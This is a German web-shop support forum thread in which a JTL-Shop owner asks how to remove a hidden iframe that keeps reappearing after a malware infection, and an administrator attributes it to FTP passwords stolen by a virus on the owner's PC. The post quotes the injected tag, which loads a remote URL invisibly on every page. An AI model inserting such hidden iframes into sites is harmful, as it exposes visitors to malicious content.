Offen iframesrc unter Content lässt sich nicht löschen

Raben

Gut bekanntes Mitglied
8. Februar 2012
130
0
Guten Morgen Zusammen!

Nach zwei schlaflosen Nächten, wende ich mich nun heute an Euch. Unser JTL-Shop3 3 wurde vor 2 Monaten mit Malware infiziert. Was zur Folge hatte, dass Google vor unserer Domain warnt und User vor dem Besuch blockt.

Nun habe ich den Shop ganz neu installiert (3.12) und finde unter jedem Content weiterhin folgenden Eintrag:
HTML:
<iframesrc="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"style="display:  none; visibility:hidden;"></iframe></p>

Ich habe es schon rausgelöscht, es erscheint jedoch nach dem speichern immer wieder. Kann mir jemand helfen? Wie bekomme ich diesen Eintrag raus?

david

Administrator
Mitarbeiter
16. Juli 2010
2.310
170
AW: iframesrc unter Content lässt sich nicht löschen

Unser JTL-Shop3 3 wurde vor 2 Monaten mit Malware infiziert.

Deine Server-Dateien wurden infiziert, weil du dir auf deinem Rechner einen Virus eingefangen hast, welcher die Passwörter aus deinem FTP-Client ausgelesen hat.
Mit diesen FTP-Zugangsdaten kann man sich nun verbinden, die Dateien manipulieren und jeden Mist reinschreiben.

Du musst also folgendermaßen vorgehen, um das Problem zu beheben:
1. Virus auf deinem Windows-PC komplett entfernen, im Zweifelsfall Windows neuinstallieren.
2. FTP-Passwörter ändern
3. alle Shopdateien überschreiben

Die Reihenfolge ist extrem wichtig. Wenn du den Virus auf deinem PC nicht komplett entfernst, kriegst du das Problem nicht in den Griff.

Raben

Gut bekanntes Mitglied
8. Februar 2012
130
0
AW: iframesrc unter Content lässt sich nicht löschen

o_O pffffff also noch mal von vorn :) Vielen vielen Dank